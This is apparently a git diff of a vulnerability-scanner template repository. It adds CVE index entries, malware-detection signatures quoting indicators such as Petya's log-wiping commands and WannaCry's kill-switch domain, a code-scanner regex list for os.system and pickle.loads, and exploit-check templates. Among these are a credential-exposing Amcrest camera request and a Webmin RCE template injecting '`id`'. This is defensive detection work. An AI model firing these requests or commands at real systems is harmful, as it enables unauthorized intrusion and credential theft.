{"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c=1.2.22 - Remote Command Injection","Severity":"critical","Description":"Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46169.yaml"}
{"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46381.yaml"}
{"ID":"CVE-2022-46443","Info":{"Name":"Bangresto - SQL Injection","Severity":"high","Description":"Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-46443.yaml"}
{"ID":"CVE-2022-46888","Info":{"Name":"NexusPHP \u003c1.7.33 - Cross-Site Scripting","Severity":"medium","Description":"NexusPHP before 1.7.33 contains multiple cross-site scripting vulnerabilities via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id parameter in /viewrequests.php. An attacker can inject arbitrary web script or HTML, which can allow theft of cookie-based authentication credentials and launch of other attacks..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46888.yaml"}
{"ID":"CVE-2022-46934","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46934.yaml"}
{"ID":"CVE-2022-47002","Info":{"Name":"Masa CMS - Authentication Bypass","Severity":"critical","Description":"Masa CMS 7.2, 7.3, and 7.4-beta are susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-47002.yaml"}
@ -1892,6 +1899,7 @@
{"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
{"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"}
{"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"high","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"}
@ -1972,3 +1980,5 @@
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
{"ID":"CVE-2015-9323","Info":{"Name":"404 to 301 \u003c= 2.0.2 - Authenticated Blind SQL Injection","Severity":"critical","Description":"The 404 to 301 Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/CVE-2015-9323.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
a11349fed98e93a8bbebdc46ec6718ae
a9b24e5df67bd3f35194cf16454fc5be

23
file/malware/basicrat-malware.yaml Normal file
View File

@ -0,0 +1,23 @@
id: basicrat-malware
info:
name: BasicRAT Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/multi/malware_multi_vesche_basicrat.yara
tags: malware,file,basicrat
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "HKCU Run registry key applied"
- "HKCU Run registry key failed"
- "Error, platform unsupported."
- "Persistence successful,"
- "Persistence unsuccessful,"
condition: and

21
file/malware/cerber-malware.yaml Normal file
View File

@ -0,0 +1,21 @@
id: cerber-malware
info:
name: Cerber Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara
tags: malware,file,cerber
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "38oDr5.vbs"
- "8ivq.dll"
- "jmsctls_progress32"
condition: and

28
file/malware/crunchrat-malware.yaml Normal file
View File

@ -0,0 +1,28 @@
id: crunchrat-malware
info:
name: CrunchRAT Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara
tags: malware,file,crunchrat
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "<action>command<action>"
- "<action>upload<action>"
- "<action>download<action>"
- "cmd.exe"
- "application/x-www-form-urlencoded"
- "&action="
- "&secondary="
- "<secondary>"
- "<action>"
condition: and
case-insensitive: true

23
file/malware/hydracrypt-malware.yaml Normal file
View File

@ -0,0 +1,23 @@
id: ransomware_windows_hydracrypt
info:
name: Hydracrypt Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara
tags: malware,file,hydracrypt
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "oTraining"
- "Stop Training"
- "Play \"sound.wav\""
- "&Start Recording"
- "7About record"
condition: and

38
file/malware/macos-bella-malware.yaml Normal file
View File

@ -0,0 +1,38 @@
id: macos-bella-malware
info:
name: Bella Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/macos/malware_macos_bella.yara
tags: malware,file,macos-bella
file:
- extensions:
- all
matchers-condition: or
matchers:
- type: word
part: raw
words:
- "Verified! [2FV Enabled] Account ->"
- "There is no root shell to perform this command. See [rooter] manual entry."
- "Attempt to escalate Bella to root through a variety of attack vectors."
- "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER."
condition: or
- type: word
part: raw
words:
- "user_pass_phish"
- "bella_info"
- "get_root"
condition: and
- type: word
part: raw
words:
- "Please specify a bella server."
- "What port should Bella connect on [Default is 4545]:"
condition: and

24
file/malware/petya-malware-variant-1.yaml Normal file
View File

@ -0,0 +1,24 @@
id: petya-malware-variant-1
info:
name: Petya Malware (Variant 1) - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara
tags: malware,file,petya
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "Ooops, your important files are encrypted."
- "Send your Bitcoin wallet ID and personal installation key to e-mail"
- "wowsmith123456@posteo.net. Your personal installation key:"
- "Send $300 worth of Bitcoin to following address:"
- "have been encrypted. Perhaps you are busy looking for a way to recover your"
- "need to do is submit the payment and purchase the decryption key."
condition: or

20
file/malware/petya-malware-variant-3.yaml Normal file
View File

@ -0,0 +1,20 @@
id: petya-malware-variant-3
info:
name: Petya Malware (Variant 3) - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_3.yara
tags: malware,file,petya
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "wevtutil cl Setup & wevtutil cl System"
- "fsutil usn deletejournal /D %c:"
condition: or

18
file/malware/petya-malware-variant-bitcoin.yaml Normal file
View File

@ -0,0 +1,18 @@
id: petya-malware-variant-bitcoin
info:
name: Petya Malware (Variant Bitcoin) - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara
tags: malware,file,petya
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB"

29
file/malware/pony-stealer-malware.yaml Normal file
View File

@ -0,0 +1,29 @@
id: pony-stealer-malware
info:
name: Windows Pony Stealer Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/windows/malware_windows_pony_stealer.yara
tags: malware,file,pony,stealer
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "signons.sqlite"
- "signons.txt"
- "signons2.txt"
- "signons3.txt"
- "WininetCacheCredentials"
- "moz_logins"
- "encryptedPassword"
- "FlashFXP"
- "BulletProof"
- "CuteFTP"
condition: and
case-insensitive: true

21
file/malware/powerware-malware.yaml Normal file
View File

@ -0,0 +1,21 @@
id: powerware-malware
info:
name: PowerWare Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara
tags: malware,file,powerware
file:
- extensions:
- all
matchers:
- type: word
part: raw
words:
- "ScriptRunner.dll"
- "ScriptRunner.pdb"
- "fixed.ps1"
condition: and

32
file/malware/wannacry-malware.yaml Normal file
View File

@ -0,0 +1,32 @@
id: wannacry-malware
info:
name: WannaCry Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_wannacry.yara
tags: malware,file,wannacry
file:
- extensions:
- all
matchers-condition: or
matchers:
- type: word
part: raw
words:
- "msg/m_chinese"
- ".wnry"
- "attrib +h"
condition: and
- type: word
part: raw
words:
- "WNcry@2ol7"
- "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
- "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn"
- "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw"
- "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94"
condition: or

34
file/malware/zrypt-malware.yaml Normal file
View File

@ -0,0 +1,34 @@
id: zrypt-malware
info:
name: Zcrypt Malware - Detect
author: daffainfo
severity: info
reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara
tags: malware,file,zrypt
file:
- extensions:
- all
matchers-condition: or
matchers:
- type: word
part: raw
words:
- "How to Buy Bitcoins"
- "ALL YOUR PERSONAL FILES ARE ENCRYPTED"
- "Click Here to Show Bitcoin Address"
- "MyEncrypter2.pdb"
condition: or
- type: word
part: raw
words:
- ".p7b"
- ".p7c"
- ".pdd"
- ".pef"
- ".pem"
- "How to decrypt files.html"
condition: and

20
file/python/python-scanner.yaml
View File

@ -21,26 +21,36 @@ file:
- 'exec'
- 'eval'
- '__import__'
- 'execfile'
- type: regex
name: command-injection
regex:
- 'subprocess.call\(.*shell=True.*\)'
- 'os.system'
- 'os.popen'
- 'os.popen\d?'
- 'subprocess.run'
- 'commands.getoutput'
- type: regex
name: untrusted-source
regex:
- 'pickle.loads'
- 'cPickle.loads'
- 'pickle\.loads'
- 'c?Pickle\.loads?'
- 'marshal\.loads'
- 'pickle\.Unpickler'
- type: regex
name: dangerous-yaml
regex:
- 'yaml.load'
- 'yaml\.load'
- 'yaml\.safe_load'
- type: regex
name: sqli
regex:
- 'cursor.execute'
- 'cursor\.execute'
- 'sqlite3\.execute'
- 'MySQLdb\.execute'
- 'psycopg2\.execute'
- 'cx_Oracle\.execute'

219
file/url-analyse/url-extension-inspector.yaml Normal file
View File

@ -0,0 +1,219 @@
id: url-extension-inspector
info:
name: URL Extension Inspector
author: ayadim
severity: unknown
description: |
This template assists you in discovering intriguing extensions within a list of URLs.
reference:
- https://github.com/CYS4srl/CYS4-SensitiveDiscoverer/
tags: file,urls,extension
file:
- extensions:
- all
extractors:
- type: regex
name: Hot finding
regex:
- "(?i)(htdocs|www|html|web|webapps|public|public_html|uploads|website|api|test|app|backup|bin|bak|old|release|sql)\\.(7z|bz2|gz|lz|rar|tar\\.gz|tar\\.bz2|xz|zip|z)"
- type: regex
name: Backup file
regex:
- "(?i)(\\.bak|\\.backup|\\.bkp|\\._bkp|\\.bk|\\.BAK)"
- type: regex
name: PHP Source
regex:
- "(?i)(\\.php)(\\.~|\\.bk|\\.bak|\\.bkp|\\.BAK|\\.swp|\\.swo|\\.swn|\\.tmp|\\.save|\\.old|\\.new|\\.orig|\\.dist|\\.txt|\\.disabled|\\.original|\\.backup|\\._back|\\._1\\.bak|~|!|\\.0|\\.1|\\.2|\\.3)"
- type: regex
name: ASP Source
regex:
- "(?i)(\\.asp)(\\.~|\\.bk|\\.bak|\\.bkp|\\.BAK|\\.swp|\\.swo|\\.swn|\\.tmp|\\.save|\\.old|\\.new|\\.orig|\\.dist|\\.txt|\\.disabled|\\.original|\\.backup|\\._back|\\._1\\.bak|~|!|\\.0|\\.1|\\.2|\\.3)"
- type: regex
name: Database file
regex:
- "(?i)\\.db|\\.sql"
- type: regex
name: Bash script
regex:
- "(?i)\\.sh|\\.bashrc|\\.zshrc"
- type: regex
name: 1Password password manager database file
regex:
- "(?i)\\.agilekeychain"
- type: regex
name: ASP configuration file
regex:
- "(?i)\\.asa"
- type: regex
name: Apple Keychain database file
regex:
- "(?i)\\.keychain"
- type: regex
name: Azure service configuration schema file
regex:
- "(?i)\\.cscfg"
- type: regex
name: Compressed archive file
regex:
- "(?i)(\\.zip|\\.gz|\\.tar|\\.rar|\\.tgz)"
- type: regex
name: Configuration file
regex:
- "(?i)(\\.ini|\\.config|\\.conf)"
- type: regex
name: Day One journal file
regex:
- "(?i)\\.dayone"
- type: regex
name: Document file
regex:
- "(?i)(\\.doc|\\.docx|\\.rtf)"
- type: regex
name: GnuCash database file
regex:
- "(?i)\\.gnucash"
- type: regex
name: Include file
regex:
- "(?i)\\.inc"
- type: regex
name: XML file
regex:
- "(?i)\\.xml"
- type: regex
name: Old file
regex:
- "(?i)\\.old"
- type: regex
name: Log file
regex:
- "(?i)\\.log"
- type: regex
name: Java file
regex:
- "(?i)\\.java"
- type: regex
name: SQL dump file
regex:
- "(?i)\\.sql"
- type: regex
name: Excel file
regex:
- "(?i)(\\.xls|\\.xlsx|\\.csv)"
- type: regex
name: Certificate file
regex:
- "(?i)(\\.cer|\\.crt|\\.p7b)"
- type: regex
name: Java key storte
regex:
- "(?i)\\.jks"
- type: regex
name: KDE Wallet Manager database file
regex:
- "(?i)\\.kwallet"
- type: regex
name: Little Snitch firewall configuration file
regex:
- "(?i)\\.xpl"
- type: regex
name: Microsoft BitLocker Trusted Platform Module password file
regex:
- "(?i)\\.tpm"
- type: regex
name: Microsoft BitLocker recovery key file
regex:
- "(?i)\\.bek"
- type: regex
name: Microsoft SQL database file
regex:
- "(?i)\\.mdf"
- type: regex
name: Microsoft SQL server compact database file
regex:
- "(?i)\\.sdf"
- type: regex
name: Network traffic capture file
regex:
- "(?i)\\.pcap"
- type: regex
name: OpenVPN client configuration file
regex:
- "(?i)\\.ovpn"
- type: regex
name: PDF file
regex:
- "(?i)\\.pdf"
- type: regex
name: PHP file
regex:
- "(?i)\\.pcap"
- type: regex
name: Password Safe database file
regex:
- "(?i)\\.psafe3"
- type: regex
name: Potential configuration file
regex:
- "(?i)\\.yml"
- type: regex
name: Potential cryptographic key bundle
regex:
- "(?i)(\\.pkcs12|\\.p12|\\.pfx|\\.asc|\\.pem)"
- type: regex
name: Potential private key
regex:
- "(?i)otr.private_key"
- type: regex
name: Presentation file
regex:
- "(?i)(\\.ppt|\\.pptx)"
- type: regex
name: Python file
regex:
- "(?i)\\.py"
- type: regex
name: Remote Desktop connection file
regex:
- "(?i)\\.rdp"
- type: regex
name: Ruby On Rails file
regex:
- "(?i)\\.rb"
- type: regex
name: SQLite database file
regex:
- "(?i)\\.sqlite|\\.sqlitedb"
- type: regex
name: SQLite3 database file
regex:
- "(?i)\\.sqlite3"
- type: regex
name: Sequel Pro MySQL database manager bookmark file
regex:
- "(?i)\\.plist"
- type: regex
name: Shell configuration file
regex:
- "(?i)(\\.exports|\\.functions|\\.extra)"
- type: regex
name: Temporary file
regex:
- "(?i)\\.tmp"
- type: regex
name: Terraform variable config file
regex:
- "(?i)\\.tfvars"
- type: regex
name: Text file
regex:
- "(?i)\\.txt"
- type: regex
name: Tunnelblick VPN configuration file
regex:
- "(?i)\\.tblk"
- type: regex
name: Windows BitLocker full volume encrypted data file
regex:
- "(?i)\\.fve"

2
helpers/wordpress/plugins/advanced-custom-fields.txt
View File

@ -1 +1 @@
6.1.8
6.2.0

2
helpers/wordpress/plugins/all-in-one-wp-migration.txt
View File

@ -1 +1 @@
7.76
7.77

2
helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt
View File

@ -1 +1 @@
5.2.2
5.2.3

2
helpers/wordpress/plugins/astra-sites.txt
View File

@ -1 +1 @@
3.3.0
3.4.0

2
helpers/wordpress/plugins/coblocks.txt
View File

@ -1 +1 @@
3.0.4
3.1.2

2
helpers/wordpress/plugins/complianz-gdpr.txt
View File

@ -1 +1 @@
6.5.2
6.5.3

2
helpers/wordpress/plugins/contact-form-cfdb7.txt
View File

@ -1 +1 @@
1.2.6.6
1.2.6.7

2
helpers/wordpress/plugins/custom-post-type-ui.txt
View File

@ -1 +1 @@
1.13.7
1.14.0

2
helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt
View File

@ -1 +1 @@
1.16.2
1.18

2
helpers/wordpress/plugins/elementor.txt
View File

@ -1 +1 @@
3.15.1
3.15.2

2
helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
View File

@ -1 +1 @@
5.8.5
5.8.6

2
helpers/wordpress/plugins/facebook-for-woocommerce.txt
View File

@ -1 +1 @@
3.0.30
3.0.31

2
helpers/wordpress/plugins/google-listings-and-ads.txt
View File

@ -1 +1 @@
2.5.1
2.5.2

2
helpers/wordpress/plugins/google-site-kit.txt
View File

@ -1 +1 @@
1.106.0
1.107.0

2
helpers/wordpress/plugins/gutenberg.txt
View File

@ -1 +1 @@
16.3.0
16.4.0

2
helpers/wordpress/plugins/host-webfonts-local.txt
View File

@ -1 +1 @@
5.6.3
5.6.5

2
helpers/wordpress/plugins/kadence-blocks.txt
View File

@ -1 +1 @@
3.1.9
3.1.11

2
helpers/wordpress/plugins/leadin.txt
View File

@ -1 +1 @@
10.1.30
10.2.1

2
helpers/wordpress/plugins/limit-login-attempts-reloaded.txt
View File

@ -1 +1 @@
2.25.20
2.25.22

2
helpers/wordpress/plugins/litespeed-cache.txt
View File

@ -1 +1 @@
5.5.1
5.6

2
helpers/wordpress/plugins/mailpoet.txt
View File

@ -1 +1 @@
4.22.2
4.24.0

2
helpers/wordpress/plugins/mainwp-child.txt
View File

@ -1 +1 @@
4.4.1.3
4.5

2
helpers/wordpress/plugins/members.txt
View File

@ -1 +1 @@
3.2.5
3.2.7

2
helpers/wordpress/plugins/meta-box.txt
View File

@ -1 +1 @@
5.7.4
5.7.5

2
helpers/wordpress/plugins/ml-slider.txt
View File

@ -1 +1 @@
3.33.0
3.36.0

2
helpers/wordpress/plugins/pixelyoursite.txt
View File

@ -1 +1 @@
9.4.1
9.4.2

2
helpers/wordpress/plugins/polylang.txt
View File

@ -1 +1 @@
3.4.4
3.4.5

2
helpers/wordpress/plugins/post-smtp.txt
View File

@ -1 +1 @@
2.5.9
2.5.9.1

2
helpers/wordpress/plugins/post-types-order.txt
View File

@ -1 +1 @@
2.0.9
2.1

2
helpers/wordpress/plugins/premium-addons-for-elementor.txt
View File

@ -1 +1 @@
4.10.3
4.10.4

2
helpers/wordpress/plugins/really-simple-ssl.txt
View File

@ -1 +1 @@
7.0.7
7.0.8

2
helpers/wordpress/plugins/redux-framework.txt
View File

@ -1 +1 @@
4.4.4
4.4.5

2
helpers/wordpress/plugins/regenerate-thumbnails.txt
View File

@ -1 +1 @@
3.1.5
3.1.6

2
helpers/wordpress/plugins/seo-by-rank-math.txt
View File

@ -1 +1 @@
1.0.120
1.0.121.1

2
helpers/wordpress/plugins/siteorigin-panels.txt
View File

@ -1 +1 @@
2.25.0
2.25.2

2
helpers/wordpress/plugins/smart-slider-3.txt
View File

@ -1 +1 @@
3.5.1.17
3.5.1.19

2
helpers/wordpress/plugins/so-widgets-bundle.txt
View File

@ -1 +1 @@
1.52.0
1.53.0

2
helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt
View File

@ -1 +1 @@
9.0.16
9.0.17

2
helpers/wordpress/plugins/tablepress.txt
View File

@ -1 +1 @@
2.1.5
2.1.7

2
helpers/wordpress/plugins/taxonomy-terms-order.txt
View File

@ -1 +1 @@
1.7.7
1.7.9

2
helpers/wordpress/plugins/the-events-calendar.txt
View File

@ -1 +1 @@
6.1.3
6.2.0

2
helpers/wordpress/plugins/tinymce-advanced.txt
View File

@ -1 +1 @@
5.9.0
5.9.2

2
helpers/wordpress/plugins/translatepress-multilingual.txt
View File

@ -1 +1 @@
2.5.8
2.5.9

2
helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
View File

@ -1 +1 @@
2.7.3
2.7.4

2
helpers/wordpress/plugins/updraftplus.txt
View File

@ -1 +1 @@
1.23.7
1.23.9

2
helpers/wordpress/plugins/user-role-editor.txt
View File

@ -1 +1 @@
4.63.3
4.64

2
helpers/wordpress/plugins/w3-total-cache.txt
View File

@ -1 +1 @@
2.4.0
2.4.1

2
helpers/wordpress/plugins/woocommerce-gateway-stripe.txt
View File

@ -1 +1 @@
7.4.2
7.5.0

2
helpers/wordpress/plugins/woocommerce-payments.txt
View File

@ -1 +1 @@
6.2.2
6.3.1

2
helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt
View File

@ -1 +1 @@
3.5.6
3.6.0

2
helpers/wordpress/plugins/woocommerce-services.txt
View File

@ -1 +1 @@
2.3.1
2.3.2

2
helpers/wordpress/plugins/woocommerce.txt
View File

@ -1 +1 @@
7.9.0
8.0.2

2
helpers/wordpress/plugins/wordpress-seo.txt
View File

@ -1 +1 @@
20.12
20.13

2
helpers/wordpress/plugins/wp-google-maps.txt
View File

@ -1 +1 @@
9.0.20
9.0.23

2
helpers/wordpress/plugins/wp-optimize.txt
View File

@ -1 +1 @@
3.2.16
3.2.18

2
helpers/wordpress/plugins/wp-statistics.txt
View File

@ -1 +1 @@
14.1.4
14.1.5

2
helpers/wordpress/plugins/wp-user-avatar.txt
View File

@ -1 +1 @@
4.12.0
4.13.0

2
helpers/wordpress/plugins/wpcf7-recaptcha.txt
View File

@ -1 +1 @@
1.4.3
1.4.4

2
helpers/wordpress/plugins/wpforms-lite.txt
View File

@ -1 +1 @@
1.8.2.3
1.8.3.1

45
http/cves/2017/CVE-2017-8229.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2017-8229
info:
name: Amcrest IP Camera Web Management - Data Exposure
author: pussycat0x
severity: critical
description: |
Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8229
- http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html
- https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-255
metadata:
max-request: 1
fofa-query: "Amcrest"
shodan-query: html:"Amcrest"
verified: true
tags: cve,cve2017,amcrest,iot
http:
- method: GET
path:
- "{{BaseURL}}/current_config/Sha1Account1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DevInformation"
- "SerialID"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200

69
http/cves/2019/CVE-2019-15642.yaml Normal file
View File

@ -0,0 +1,69 @@
id: CVE-2019-15642
info:
name: Webmin < 1.920 - Authenticated Remote Code Execution
author: pussycat0x
severity: high
description: |
rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-15642
- https://github.com/jas502n/CVE-2019-15642
metadata:
max-request: 4
shodan-query: title:"Webmin"
verified: true
tags: cve,cve2019,webmin,rce
variables:
cmd: '`id`'
http:
- raw:
- |
POST /session_login.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: redirect=1; testing=1
Origin: {{RootURL}}
